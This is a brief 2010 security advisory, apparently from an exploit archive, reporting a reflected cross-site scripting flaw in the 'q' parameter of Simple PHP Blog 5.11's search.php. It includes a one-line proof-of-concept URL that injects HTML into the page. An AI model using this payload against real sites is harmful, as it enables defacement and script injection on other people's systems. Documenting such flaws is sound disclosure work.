Simple PHP Blog 5.11 cross site scripting

2010-01-13 / 2010-01-14
Credit: Sora
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

------------------------------------ > Simple PHP Blog Cross Site Scripting Exploit > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ # Vulnerability Description: Simple PHP Blog suffers from a remote cross site scripting exploit in the parameter 'q' of search.php. # Proof of Concept: http://127.0.0.1/blog/search.php?q="><H2>Hacked by Sora</H2> ________________________________ Tell the whole story with photos, right from your Messenger window. Learn how!<http://go.microsoft.com/?linkid=9706112>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top